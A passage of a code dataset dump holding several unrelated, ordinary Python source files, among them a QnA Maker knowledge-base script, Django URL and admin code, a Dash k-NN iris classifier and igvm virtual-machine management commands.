= [MetadataDTO(name='Intent',value=record['intent'])]\n #MetadataDTO(name='AdminTag',value=record['admin_tag'])]\n )\n )\n\n\n create_kb_dto = CreateKbDTO(\n name = \"SKT Chatty FAQ\",\n qna_list = qna,\n urls=None #urls\n )\n create_op = client.knowledgebase.create(create_kb_payload=create_kb_dto)\n \n create_op = _monitor_operation(client=client, operation=create_op)\n\n return create_op.resource_location.replace(\"/knowledgebases/\", \"\")\n\n# # create kb\nkb_id = create_kb(client)\nprint(kb_id)\n\n\ndef publish_kb(client, kb_id):\n client.knowledgebase.publish(kb_id=kb_id)\n\n\n\n# Publish the KB\nprint(\"Publishing KB...\")\npublish_kb (client=client, kb_id=kb_id)\nprint(\"KB Published.\")\nprint()\n\n\ndef update_kb(client, kb_id,record):\n\n qna = []\n \n qna.append(\n QnADTO(\n answer = intdict[record['intent']],\n questions = [record['question']],\n metadata = [MetadataDTO(name='Intent',value=record['intent'])]\n #MetadataDTO(name='AdminTag',value=record['admin_tag'])]\n )\n )\n\n update_kb_operation_dto = 
UpdateKbOperationDTO(\n        add=UpdateKbOperationDTOAdd(\n            qna_list=qna\n        )\n    )\n    update_op = client.knowledgebase.update(kb_id=kb_id, update_kb=update_kb_operation_dto)\n    _monitor_operation(client=client, operation=update_op)\n\n\n# Update a KB\nfor idx, record in enumerate(new_data[1:]):\n    print(\"Updating KB...\")\n    update_kb(client=client, kb_id=kb_id, record=record)\n    print(\"KB Updated.\")\nprint()\n\n","sub_path":"kb_chatty.py","file_name":"kb_chatty.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"404051268","text":"#! /usr/bin/env python\n# -*- coding: latin-1 -*-\n\n## LOGGERS\n# This module defines the base logger\n\n#Import classes from this project\nimport logger_config as loggerConfig\nimport Init.init_config as initConfig\n#Import classes external to the project\nimport logging\n\n\ndef init_loggers():\n    # Create the logger\n    logger = logging.getLogger(loggerConfig.LOGGER_BASE_NAME)\n    logger.setLevel (logging.DEBUG)\n    logger.propagate = False # Do not propagate to the root logger; some modules pollute the global logger\n\n    # Set the logger's output level for the LOG_FILE file\n    fh = logging.FileHandler(initConfig.RUN_TIME_FOLDER + loggerConfig.LOG_FILE, mode = 'a')\n    fh.setLevel(logging.DEBUG)\n    formatter = logging.Formatter(fmt = '%(asctime)s - %(name)s - %(levelname)s | %(message)s', datefmt = '%d/%m %H:%M:%S')\n    fh.setFormatter(formatter)\n    logger.addHandler(fh)\n\n    # Set the logger's output level for the console\n    ch = logging.StreamHandler()\n    ch.setLevel(logging.DEBUG)\n    formatter2 = logging.Formatter(fmt = '%(name)s - %(levelname)s | %(message)s')\n    ch.setFormatter(formatter2)\n    logger.addHandler(ch)\n\ndef getLogger (subLogger):\n    return logging.getLogger ('{}.{}'.format(loggerConfig.LOGGER_BASE_NAME, subLogger))\n\n#Start the loggers\ninit_loggers()\n","sub_path":"crawling/Logger/init_logger.py","file_name":"init_logger.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
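A small usage sketch for the logger module above, assuming it is imported from inside the crawler package where logger_config and Init.init_config resolve:

import init_logger  # importing the module already runs init_loggers()

log = init_logger.getLogger('crawler')         # yields '<LOGGER_BASE_NAME>.crawler'
log.info('sub-logger %s is ready', 'crawler')  # written to both the file and console handlers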
{"seq_id":"529214800","text":"# https://www.jiuzhang.com/solutions/peak-index-in-a-mountain-array#tag-highlight-lang-python\nfrom typing import List\n\nclass Solution:\n    def peakIndexInMountainArray(self, A: List[int]) -> int:\n        return self.binary_search_peak(A)\n        # return self.binary_search(A)\n        # return self.ternary_search(A)\n\n    def ternary_search(self, nums):\n        # Works with duplicates, i.e. [1,1,1,1,2,1,1,1,1]\n        start, end = 0, len(nums) - 1\n        while start + 3 < end:\n            mid1 = start + (end - start) // 3\n            mid2 = end - (end - start) // 3\n            if nums[mid1] < nums[mid2]:\n                start = mid1\n            elif nums[mid1] > nums[mid2]:\n                end = mid2\n            elif nums[mid1] == nums[mid2]:\n                start, end = mid1, mid2\n\n        peak = nums[start]\n        peak_id = start\n        for idx in range(start, end + 1):\n            if nums[idx] > peak:\n                peak = nums[idx]\n                peak_id = idx\n        return peak_id\n\n    def binary_search_peak(self, nums):\n        # Doesn't work with duplicates, i.e. [1,1,1,1,2,1,1,1,1]\n        # Since the peak is guaranteed not to sit at either edge, we just have to find the maximum.\n        start, end = 0, len(nums) - 1\n\n        while start + 1 < end:\n            mid = (start + end) // 2\n            if nums[mid - 1] < nums[mid]:\n                start = mid\n            else:\n                end = mid\n\n        if nums[start] > nums[end]:\n            return start\n        return end\n\n    def binary_search(self, nums):\n        start, end = 0, len(nums) - 1\n        while start + 1 < end:\n            mid = (start + end) // 2\n\n            if self._is_peak(nums, mid):\n                return mid\n\n            if self._is_pos_slope(nums, mid):\n                start = mid\n            else:\n                end = mid\n\n        if nums[start] > nums[end]:\n            return start\n        return end\n\n    def _is_peak(self, nums, idx):\n        if idx == 0 or idx == len(nums) - 1:\n            return False\n        return nums[idx - 1] < nums[idx] and nums[idx] > nums[idx + 1]\n\n    def _is_pos_slope(self, nums, idx):\n        return nums[idx - 1] < nums[idx] and nums[idx] < nums[idx + 1]\n","sub_path":"leetcode/lc852_Peak_Index_in_a_Mountain_Array.py","file_name":"lc852_Peak_Index_in_a_Mountain_Array.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"352606357","text":"__author__ = 'dpak'\nfrom django.conf.urls import include, url\nfrom django.contrib import admin, auth\nfrom . import views\n\nurlpatterns = [\n    url(r'^$', views.home, name='oqa'),\n    url(r'^get_all_applications/$', views.get_all_applications, name='get_all_applications'),\n    url(r'^question/$', views.question, name='question'),\n    url(r'^edit_question/$', views.edit_question, name='edit_question'),\n    url(r'^delete_question/$', views.delete_question, name='delete_question'),\n    url(r'^answer/$', views.answer, name='answer'),\n    url(r'^new_question/$', views.new_question, name='new_question'),\n    url(r'^get_new_question/$', views.get_new_question, name='get_new_question'),\n    url(r'^do_edit_question/$', views.do_edit_question, name='do_edit_question'),\n    url(r'^get_edited_question/$', views.get_edited_question, name='get_edited_question'),\n    url(r'^get_new_answer/$', views.get_new_answer, name='get_new_answer'),\n    url(r'^get_answer_form/$', views.get_answer_form, name='get_answer_form'),\n    url(r'^get_answer_actions/$', views.get_answer_actions, name='get_answer_actions'),\n    url(r'^delete_answer/$', views.delete_answer, name='delete_answer'),\n    url(r'^get_edit_answer_information/$', views.get_edit_answer_information, name='get_edit_answer_information'),\n    url(r'^social_share_answer/$', views.social_share_answer, name='social_share_answer'),\n    url(r'^edit_answer/$', views.edit_answer, name='edit_answer'),\n    url(r'^get_edited_answer/$', views.get_edited_answer, name='get_edited_answer'),\n    url(r'^answer_reporting/$', views.answer_reporting, name='answer_reporting'),\n    url(r'^do_answer_report/$', views.do_answer_report, name='do_answer_report'),\n    url(r'^platforms/$', views.platforms, name='platforms'),\n    url(r'^fave_platform/$', views.fave_platform, name='fave_platform'),\n    url(r'^favorites/$', views.favorites, name='favorites'),\n    url(r'^remove_faved_platform/$', views.remove_faved_platform, name='remove_faved_platform'),\n    url(r'^search_platform/$', views.search_platform, name='search_platform'),\n    url(r'^faved_platform_search/$', views.faved_platform_search, name='faved_platform_search'),\n    url(r'^communities/$', views.communities, name='communities'),\n    url(r'^join_community/$', views.join_community, name='join_community'),\n    url(r'^search_community/$', views.search_community, name='search_community'),\n    url(r'^new_community_form/$', views.new_community_form, 
name='new_community_form'),\n url(r'^register_community/$', views.register_community, name='register_community'),\n url(r'^my_communities/$', views.my_communities, name='my_communities'),\n url(r'^search_my_communities/$', views.search_my_communities, name='search_my_communities'),\n url(r'^search_admin_communities/$', views.search_admin_communities, name='search_admin_communities'),\n url(r'^manage_community/$', views.manage_community, name='manage_community'),\n url(r'^community_members/$', views.community_members, name='community_members'),\n url(r'^community_member_actions/$', views.community_member_actions, name='community_member_actions'),\n url(r'^community_qas/$', views.community_qas, name='community_qas'),\n url(r'^search_qa/$', views.search_qa, name='search_qa'),\n url(r'^delete_community_member/$', views.delete_community_member, name='delete_community_member'),\n url(r'^block_community_member/$', views.block_community_member, name='block_community_member'),\n url(r'^unblock_community_member/$', views.unblock_community_member, name='unblock_community_member'),\n url(r'^get_community_member_actions/$', views.get_community_member_actions, name='get_community_member_actions'),\n url(r'^search_community_members/$', views.search_community_members, name='search_community_members'),\n url(r'^community_member_permissions/$', views.community_member_permissions, name='community_member_permissions'),\n url(r'^set_community_member_permissions/$', views.set_community_member_permissions, name='set_community_member_permissions'),\n url(r'^vote_question/$', views.vote_question, name='vote_question'),\n url(r'^get_vote_question_content/$', views.get_vote_question_content, name='get_vote_question_content'),\n url(r'^unvote_question/$', views.unvote_question, name='unvote_question'),\n url(r'^vote_answer/$', views.vote_answer, name='vote_answer'),\n url(r'^unvote_answer/$', views.unvote_answer, name='unvote_answer'),\n url(r'^get_vote_answer_content/$', views.get_vote_answer_content, name='get_vote_answer_content'),\n url(r'^add_question_favourite/$', views.add_question_favourite, name='add_question_favourite'),\n url(r'^remove_question_favourite/$', views.remove_question_favourite, name='remove_question_favourite'),\n url(r'^get_anchor_action_menu/$', views.get_anchor_action_menu, name='get_anchor_action_menu'),\n url(r'^anchor_me/$', views.anchor_me, name='anchor_me'),\n url(r'^un_anchor_me/$', views.un_anchor_me, name='un_anchor_me'),\n url(r'^favorites_questions/$', views.favorites_questions, name='favorites_questions'),\n url(r'^get_unfollowed_communities/$', views.get_unfollowed_communities, name='get_unfollowed_communities'),\n]","sub_path":"oqa/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"399878690","text":"#Peak_Mean Detection (Resample possible)\ndef PeakM(XT, XT_, Location_Name, Debug='False'):\n test = sum(XT).reset_index()\n test.columns = ['Dates','Tweets']\n test.index = pd.to_datetime(test['Dates'], format=\"%d-%m-%Y\")\n del test['Dates']\n test = test.resample('2D',how='sum')\n test['Tweets'] = test['Tweets'].fillna(0)\n \n meanT = np.mean(test['Tweets'])\n \n test.loc[:,'Peak_Value'] = 0\n for x in range(0, len(test['Tweets'])):\n if test['Tweets'][x] > meanT:\n test.loc[:,'Peak_Value'][x] = (test['Tweets'][x]/meanT)\n else:\n test.loc[:,'Peak_Value'][x] = 0 \n \n test.to_csv('E:/Konstantin/School - Nijmegen/Master 
Thesis/CSV/Peak/'+XT_+Location_Name+'_PeakM'+'.csv')\n","sub_path":"Peak_Mean_Detection.py","file_name":"Peak_Mean_Detection.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"4312564","text":"import wx\n\nclass EditMenu(wx.Menu):\n    def __init__(self):\n        wx.Menu.__init__(self)\n        \n        self.undoMenuItem = wx.MenuItem(self, wx.ID_UNDO, \"&Undo\", wx.EmptyString, wx.ITEM_NORMAL)\n        self.AppendItem(self.undoMenuItem)\n        \n        self.redoMenuItem = wx.MenuItem(self, wx.ID_REDO, \"&Redo\", wx.EmptyString, wx.ITEM_NORMAL)\n        self.AppendItem(self.redoMenuItem)\n        \n        self.AppendSeparator()\n        \n        self.cutMenuItem = wx.MenuItem(self, wx.ID_CUT, \"Cu&t\", wx.EmptyString, wx.ITEM_NORMAL)\n        self.AppendItem(self.cutMenuItem)\n        \n        self.copyMenuItem = wx.MenuItem(self, wx.ID_COPY, \"&Copy\", wx.EmptyString, wx.ITEM_NORMAL)\n        self.AppendItem(self.copyMenuItem)\n        \n        self.pasteMenuItem = wx.MenuItem(self, wx.ID_PASTE, \"&Paste\", wx.EmptyString, wx.ITEM_NORMAL)\n        self.AppendItem(self.pasteMenuItem)\n        \n        self.deleteMenuItem = wx.MenuItem(self, wx.ID_DELETE, \"&Delete\", wx.EmptyString, wx.ITEM_NORMAL)\n        self.AppendItem(self.deleteMenuItem)\n        \n        self.AppendSeparator()\n        \n        self.selectAllMenuItem = wx.MenuItem(self, wx.ID_SELECTALL, \"Select &All\", wx.EmptyString, wx.ITEM_NORMAL)\n        self.AppendItem(self.selectAllMenuItem)\n","sub_path":"PythonEditor/src/ui/menu/edit_menu.py","file_name":"edit_menu.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"253937614","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom mendeley_client import MendeleyClient\n\n# Rename this file to mendeley.py after adding the keys below!\nmendeley = MendeleyClient('', '')\n\ntry:\n    mendeley.load_keys()\nexcept IOError:\n    mendeley.get_required_keys()\n    mendeley.save_keys()\n","sub_path":"external/dummy_mendeley.py","file_name":"dummy_mendeley.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"251512393","text":"import dash\n# contains widgets that can be dropped into app\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objs as go\nfrom dash.dependencies import Input, Output, State\nimport pandas as pd\nimport pickle\n\n\n########### Initiate the app\n# 'app' is required by heroku\napp = dash.Dash(__name__, external_stylesheets=['https://codepen.io/chriddyp/pen/bWLwgP.css'])\n# server name is specified in proc file\nserver = app.server\napp.title='knn'\n\n########### Set up the layout\n# generates HTML code\napp.layout = html.Div(children=[\n    html.H1('Iris Classification'),\n    # multi line single-Div\n    html.Div([\n        # sections have similar code but unique slider id\n        # header\n        html.H6('Sepal Length'),\n        dcc.Slider(\n            id='slider-1',\n            min=1,\n            max=8,\n            step=0.1,\n            marks={i:str(i) for i in range(1,9)},\n            # default value\n            value=5\n        ),\n        # added linebreak so no overlap on screen\n        html.Br(),\n        # header\n        html.H6('Petal Length'),\n        dcc.Slider(\n            id='slider-2',\n            min=1,\n            max=8,\n            step=0.1,\n            marks={i:str(i) for i in range(1,9)},\n            # default value\n            value=5\n        ),\n        # added linebreak so no overlap on screen\n        html.Br(),\n        # where choice is made\n        html.H6('# of Neighbors'),\n        dcc.Dropdown(\n            id = 'k-drop',\n            value=5,\n            options=[{'label': i, 'value':i} for i in [5,10,15,20,25]]\n        ),\n        # where output data will go\n        html.H6(id='output-message', children='output will go here')\n    ]),\n\n    html.Br(),\n    html.A('See The Underlying Code On Github', href='https://github.com/lineality/intro_knn_plotly'),\n])\n############ Interactive Callbacks\n# callback function: functions with decorators (specify input and output)\n@app.callback(Output('output-message', 'children'),\n              [Input('k-drop', 'value'),\n               Input('slider-1', 'value'),\n               Input('slider-2', 'value')\n              ])\ndef display_results(k, value0, value1):\n    # this opens the pickle -- the opposite of pickling the file\n    file = open(f'resources/model_k{k}.pkl', 'rb')\n    model = pickle.load(file)\n    file.close()\n    new_obs = [[value0, value1]]\n    pred = model.predict(new_obs)\n    specieslist = ['setosa', 'versicolor', 'virginica']\n    final_pred = specieslist[pred[0]]\n    return f'For a flower with sepal length {value0} and petal length {value1}, the predicted species is \"{final_pred}\"'\n\n############ Execute the app\nif __name__ == '__main__':\n    app.run_server()\n","sub_path":"draft and template app files/app_original_backup2.py","file_name":"app_original_backup2.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
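The Dash callback above re-opens the pickle on every slider or dropdown change; a possible refinement, sketched with the resources/model_k{k}.pkl layout assumed from the app, caches each model after its first load:

import pickle
from functools import lru_cache

@lru_cache(maxsize=None)
def load_model(k):
    # One disk read per distinct k; later callbacks reuse the cached model.
    with open(f'resources/model_k{k}.pkl', 'rb') as f:
        return pickle.load(f)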
{"seq_id":"34601481","text":"from django.contrib import admin, messages\nfrom django.contrib.auth.admin import UserAdmin, GroupAdmin\nfrom django.db.models import Model, Max\nfrom django.core.urlresolvers import reverse\nfrom django.utils.translation import ugettext, ugettext_lazy as _\nfrom django.conf import settings\n\n# from qbase.forms import TreeAdminForm, TreeNodeChoiceField\nfrom qbase.models import TreeModel, TreeForeignKey\nfrom qbase.models import get_model\n\n# Not finished yet\nclass TreeModelAdmin(admin.ModelAdmin):\n\n    change_list_template = 'admin/tree_change_list.html'\n\n    # form = TreeAdminForm\n\n    def formfield_for_foreignkey(self, db_field, request, **kwargs):\n        if (issubclass(db_field.rel.to, TreeModel) and \n            not isinstance(db_field, TreeForeignKey) and \n            db_field.name not in self.raw_id_fields\n            ):\n            db = kwargs.get('using')\n            limit_choices_to = db_field.get_limit_choices_to()\n\n            defaults = dict(\n                form_class=TreeNodeChoiceField,\n                queryset=db_field.rel.to._default_manager.using(db).complex_filter(limit_choices_to),\n                required=False,\n            )\n            defaults.update(kwargs)\n            kwargs = defaults\n        return super(TreeModelAdmin, self).formfield_for_foreignkey(db_field, request, **kwargs)\n\n    def get_ordering(self, request):\n        mptt_opts = self.model._mptt_meta\n        return self.ordering or (mptt_opts.ids_attr,)\n\n#\n\ndef model_admin_url(model_or_instance, action='', model_class=None):\n    \"\"\" Build the admin URL for model_or_instance\n        (model_or_instance) => changelist\n        (model_or_instance, 'add')\n        (instance[, model_class]) => 'change'\n        (instance, 'delete'[, model_class]) => 'delete'\n        # model_class is used to specify a proxy_model\n    \"\"\"\n    if not action:\n        if isinstance(model_or_instance, Model):\n            action = 'change'\n        else:\n            action = 'changelist'\n    args = (model_or_instance.pk,) if action in ['change', 'delete'] else ()\n    model_class = model_class or model_or_instance\n    info = model_class._meta.app_label, model_class._meta.model_name, action\n    return reverse('admin:%s_%s_%s' % info, args=args)\n\ndef unregister(model, **kwargs):\n    \"\"\" Safely unregister a model from the admin\n    \"\"\"\n    site = kwargs.pop('site', admin.site)\n    site.is_registered(model) and site.unregister(model)\n\n
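# Illustrative results (hypothetical app/model names; actual URLs follow the\n# 'admin:%s_%s_%s' reverse pattern used above):\n#   model_admin_url(book)           => /admin/library/book/42/\n#   model_admin_url(Book, 'add')    => /admin/library/book/add/\n#   model_admin_url(book, 'delete') => /admin/library/book/42/delete/\n\n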
class StaffAdmin(UserAdmin):\n    \"\"\" Handle only staff users who are not superusers;\n        simplify the displayed and editable fields\n    \"\"\"\n    list_display = ('username', 'role', 'is_active', 'last_login', 'date_joined',)\n    fieldsets = (\n        (None, {'fields': ('username', 'email', 'password')}),\n        (_('Permissions'), {'fields': ('is_active', 'groups')}),\n    )\n    add_fieldsets = (\n        (None, {\n            'classes': ('wide',),\n            'fields': ('username', 'email', 'password1', 'password2'),\n        }),\n        (_('Permissions'), {\n            'classes': ('wide',),\n            'fields': ('is_active', 'groups')\n        }),\n    )\n    list_filter = ('is_active',)\n    search_fields = ('username', 'email')\n\n    def get_queryset(self, request):\n        qs = super(StaffAdmin, self).get_queryset(request)\n        qs = qs.filter(is_staff=True, is_superuser=False)\n        return qs\n\n    Users = None\n    def save_model(self, request, obj, form, change):\n        if not change:\n            if not self.Users:\n                self.Users = get_model(settings.AUTH_USER_MODEL).objects\n            row = self.Users.filter(pk__lt=100).aggregate(Max('pk'))\n            obj.pk = row['pk__max'] + 1\n            obj.is_staff = True\n            obj.is_superuser = False\n            if not obj.username and hasattr(obj, 'mobile_phone'):\n                obj.username = obj.mobile_phone\n            if not obj.username and hasattr(obj, 'email'):\n                obj.username = obj.email\n            if not obj.nickname and hasattr(obj, 'nickname'):\n                obj.nickname = obj.username\n        return super(StaffAdmin, self).save_model(request, obj, form, change)\n\n    # Make the set of permission groups easier to read\n    def role(self, obj):\n        return ','.join([str(g) for g in obj.groups.all()])\n    role.short_description = _('Permission groups')\n\n#\n\nclass QModelAdmin(admin.ModelAdmin):\n\n    pass\n\n#\n","sub_path":"qbase/qbase/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"594956664","text":"\"\"\"igvm - Command Routines\n\nCopyright (c) 2018, InnoGames GmbH\n\"\"\"\n\nimport logging\n\nfrom fabric.colors import green, red, white, yellow\nfrom fabric.network import disconnect_all\n\nfrom igvm.exceptions import InvalidStateError\nfrom igvm.host import with_fabric_settings\nfrom igvm.utils.units import parse_size\nfrom igvm.vm import VM\n\nlog = logging.getLogger(__name__)\n\n\ndef _check_defined(vm, fail_hard=True):\n    error = None\n\n    if not vm.hypervisor:\n        error = ('\"{}\" has no hypervisor defined. Use --force to ignore this'\n                 .format(vm.fqdn))\n    elif not vm.hypervisor.vm_defined(vm):\n        error = ('\"{}\" is not built yet or is not running on \"{}\"'\n                 .format(vm.fqdn, vm.hypervisor.fqdn))\n\n    if error:\n        if fail_hard:\n            raise InvalidStateError(error)\n        else:\n            log.info(error)\n\n\n@with_fabric_settings\ndef vcpu_set(vm_hostname, count, offline=False, ignore_reserved=False):\n    \"\"\"Change the number of CPUs in a VM\"\"\"\n    vm = VM(vm_hostname, ignore_reserved=ignore_reserved)\n    _check_defined(vm)\n\n    if offline and not vm.is_running():\n        log.info(\n            '\"{}\" is already powered off, ignoring --offline.'\n            .format(vm.fqdn)\n        )\n        offline = False\n\n    if count == vm.dataset_obj['num_cpu']:\n        raise Warning('CPU count is the same.')\n\n    if offline:\n        vm.shutdown()\n    vm.set_num_cpu(count)\n    if offline:\n        vm.start()\n\n\n@with_fabric_settings\ndef mem_set(vm_hostname, size, offline=False, ignore_reserved=False):\n    \"\"\"Change the memory size of a VM\n\n    The size argument is a size unit, which defaults to MiB.\n    The plus (+) and minus (-) prefixes are allowed to specify a relative\n    difference in the size. 
Reducing memory is only allowed while the VM is\n powered off.\n \"\"\"\n vm = VM(vm_hostname, ignore_reserved=ignore_reserved)\n _check_defined(vm)\n\n if size.startswith('+'):\n new_memory = vm.dataset_obj['memory'] + parse_size(size[1:], 'm')\n elif size.startswith('-'):\n new_memory = vm.dataset_obj['memory'] - parse_size(size[1:], 'm')\n else:\n new_memory = parse_size(size, 'm')\n\n if new_memory == vm.dataset_obj['memory']:\n raise Warning('Memory size is the same.')\n\n if offline and not vm.is_running():\n log.info(\n '\"{}\" is already powered off, ignoring --offline.'\n .format(vm.fqdn)\n )\n offline = False\n\n if offline:\n vm.shutdown()\n vm.set_memory(new_memory)\n if offline:\n vm.start()\n\n\n@with_fabric_settings\ndef disk_set(vm_hostname, size, ignore_reserved=False):\n \"\"\"Change the disk size of a VM\n\n Currently only increasing the disk is implemented. Size argument is\n allowed as text, but it must always be in GiBs without a decimal\n place. The plus (+) and minus (-) prefixes are allowed to specify\n a relative difference in the size. Of course, minus is going to\n error out.\n \"\"\"\n vm = VM(vm_hostname, ignore_reserved=ignore_reserved)\n _check_defined(vm)\n\n current_size_gib = vm.dataset_obj['disk_size_gib']\n if size.startswith('+'):\n new_size_gib = current_size_gib + parse_size(size[1:], 'g')\n elif size.startswith('-'):\n new_size_gib = current_size_gib - parse_size(size[1:], 'g')\n else:\n new_size_gib = parse_size(size, 'g')\n\n if new_size_gib == vm.dataset_obj['disk_size_gib']:\n raise Warning('Disk size is the same.')\n\n vm.hypervisor.vm_set_disk_size_gib(vm, new_size_gib)\n\n vm.dataset_obj['disk_size_gib'] = new_size_gib\n vm.dataset_obj.commit()\n\n\n@with_fabric_settings\ndef vm_build(vm_hostname, localimage=None, nopuppet=False, postboot=None,\n ignore_reserved=False):\n \"\"\"Create a VM and start it\n\n Puppet in run once to configure baseline networking.\n \"\"\"\n\n vm = VM(vm_hostname)\n\n # Could also have been set in serveradmin already.\n if not vm.hypervisor:\n vm.set_best_hypervisor(\n ['online', 'online_reserved'] if ignore_reserved else ['online']\n )\n\n vm.build(\n localimage=localimage,\n runpuppet=not nopuppet,\n postboot=postboot,\n )\n\n\n@with_fabric_settings\ndef vm_rebuild(vm_hostname, force=False):\n \"\"\"Destroy and reinstall a VM\"\"\"\n vm = VM(vm_hostname, ignore_reserved=True)\n _check_defined(vm)\n\n if vm.is_running():\n if force:\n vm.hypervisor.stop_vm_force(vm)\n else:\n raise InvalidStateError('\"{}\" is still running.'.format(vm.fqdn))\n\n vm.hypervisor.delete_vm(vm)\n vm.build()\n\n\n@with_fabric_settings\ndef vm_start(vm_hostname):\n \"\"\"Start a VM\"\"\"\n vm = VM(vm_hostname)\n _check_defined(vm)\n\n if vm.is_running():\n log.info('\"{}\" is already running.'.format(vm.fqdn))\n return\n vm.start()\n\n\n@with_fabric_settings\ndef vm_stop(vm_hostname, force=False):\n \"\"\"Gracefully stop a VM\"\"\"\n vm = VM(vm_hostname)\n _check_defined(vm)\n\n if not vm.is_running():\n log.info('\"{}\" is already stopped.'.format(vm.fqdn))\n return\n if force:\n vm.hypervisor.stop_vm_force(vm)\n else:\n vm.shutdown()\n log.info('\"{}\" is stopped.'.format(vm.fqdn))\n\n\n@with_fabric_settings\ndef vm_restart(vm_hostname, force=False, no_redefine=False):\n \"\"\"Restart a VM\n\n The VM is shut down and recreated, using the existing disk. 
This can be\n useful to discard temporary changes or adapt new hypervisor optimizations.\n No data will be lost.\n \"\"\"\n vm = VM(vm_hostname, ignore_reserved=True)\n _check_defined(vm)\n\n if not vm.is_running():\n raise InvalidStateError('\"{}\" is not running'.format(vm.fqdn))\n\n if force:\n vm.hypervisor.stop_vm_force(vm)\n else:\n vm.shutdown()\n\n if not no_redefine:\n vm.hypervisor.redefine_vm(vm)\n\n vm.start()\n log.info('\"{}\" is restarted.'.format(vm.fqdn))\n\n\n@with_fabric_settings\ndef vm_delete(vm_hostname, force=False, retire=False):\n \"\"\"Delete the VM from the hypervisor and from serveradmin\n\n If force is True the VM will be deleted even though it is still running on\n its hypervisor. Furthermore force will delete the serveradmin object, even\n if the VM doesn't have a hypervisor set in serveradmin or it has not yet\n been created on the defined hypervisor.\n\n If retire is True the VM will not be deleted from serveradmin but it's\n state will be updated to 'retired'.\n \"\"\"\n\n vm = VM(vm_hostname, ignore_reserved=True)\n # Make sure the VM has a hypervisor and that it is defined on it.\n # Abort if the VM has not been defined and force is not True.\n _check_defined(vm, fail_hard=not force)\n\n # Make sure the VM is shut down.\n # Abort if the VM is not shut down and force is not True.\n if vm.hypervisor and vm.hypervisor.vm_defined(vm) and vm.is_running():\n if force:\n vm.hypervisor.stop_vm_force(vm)\n else:\n raise InvalidStateError('\"{}\" is still running.'.format(vm.fqdn))\n\n # Delete the VM from its hypervisor if required.\n if vm.hypervisor and vm.hypervisor.vm_defined(vm):\n vm.hypervisor.delete_vm(vm)\n\n # Delete the serveradmin object of this VM\n # or update its state to 'retired' if retire is True.\n if retire:\n vm.dataset_obj['state'] = 'retired'\n vm.dataset_obj.commit()\n log.info(\n '\"{}\" is destroyed and set to \"retired\" state.'\n .format(vm.fqdn)\n )\n else:\n vm.dataset_obj.delete()\n vm.dataset_obj.commit()\n log.info(\n '\"{}\" is destroyed and deleted from Serveradmin'\n .format(vm.fqdn)\n )\n\n\n@with_fabric_settings\ndef vm_sync(vm_hostname):\n \"\"\"Synchronize VM resource attributes to Serveradmin\n\n This command collects actual resource allocation of a VM from the\n hypervisor and overwrites outdated attribute values in Serveradmin.\"\"\"\n vm = VM(vm_hostname, ignore_reserved=True)\n _check_defined(vm)\n\n attributes = vm.hypervisor.vm_sync_from_hypervisor(vm)\n changed = []\n for attrib, value in attributes.iteritems():\n current = vm.dataset_obj[attrib]\n if current == value:\n log.info('{}: {}'.format(attrib, current))\n continue\n log.info('{}: {} -> {}'.format(attrib, current, value))\n vm.dataset_obj[attrib] = value\n changed.append(attrib)\n if changed:\n vm.dataset_obj.commit()\n log.info(\n '\"{}\" is synchronized {} attributes ({}).'\n .format(vm.fqdn, len(changed), ', '.join(changed))\n )\n else:\n log.info(\n '\"{}\" is already synchronized on Serveradmin.'.format(vm.fqdn)\n )\n\n\n@with_fabric_settings\ndef host_info(vm_hostname):\n \"\"\"Extract runtime information about a VM\n\n Library consumers should use VM.info() directly.\n \"\"\"\n vm = VM(vm_hostname, ignore_reserved=True)\n\n info = vm.info()\n\n # Disconnect fabric now to avoid messages after the table\n disconnect_all()\n\n categories = (\n ('General', (\n 'hypervisor',\n 'status',\n )),\n ('Network', (\n 'intern_ip',\n 'mac_address',\n )),\n ('Resources', (\n 'num_cpu',\n 'max_cpus',\n 'memory',\n 'memory_free',\n 'max_mem',\n 'disk',\n 
'disk_size_gib',\n 'disk_free_gib',\n )),\n # Anything else will appear in this section\n ('Other', None),\n )\n\n def _progress_bar(free_key, capacity_key, result_key, unit):\n \"\"\"Helper to show nice progress bars.\"\"\"\n if free_key not in info or capacity_key not in info:\n return\n free = info[free_key]\n del info[free_key]\n capacity = info[capacity_key]\n del info[capacity_key]\n\n simple_stats = (\n 'Current: {} {unit}\\n'\n 'Free: {} {unit}\\n'\n 'Max: {} {unit}'\n .format(capacity - free, free, capacity, unit=unit)\n )\n\n if not 0 <= free <= capacity > 0:\n log.warning(\n '{} ({}) and {} ({}) have weird ratio, skipping progress '\n 'calculation'\n .format(free_key, free, capacity_key, capacity)\n )\n info[result_key] = red(simple_stats)\n return\n\n assert free >= 0 and free <= capacity\n ratio = 1 - float(free) / float(capacity)\n if ratio >= 0.9:\n color = red\n elif ratio >= 0.8:\n color = yellow\n else:\n color = green\n\n max_bars = 20\n num_bars = int(round(ratio * max_bars))\n info[result_key] = (\n '[{}{}] {}%\\n{}'\n .format(\n color('#' * num_bars), ' ' * (max_bars - num_bars),\n int(round(ratio * 100)),\n simple_stats,\n )\n )\n\n _progress_bar('memory_free', 'memory', 'memory', 'MiB')\n _progress_bar('disk_free_gib', 'disk_size_gib', 'disk', 'GiB')\n\n max_key_len = max(len(k) for k in info.keys())\n for category, keys in categories:\n # Handle 'Other' section by defaulting to all keys\n keys = keys or 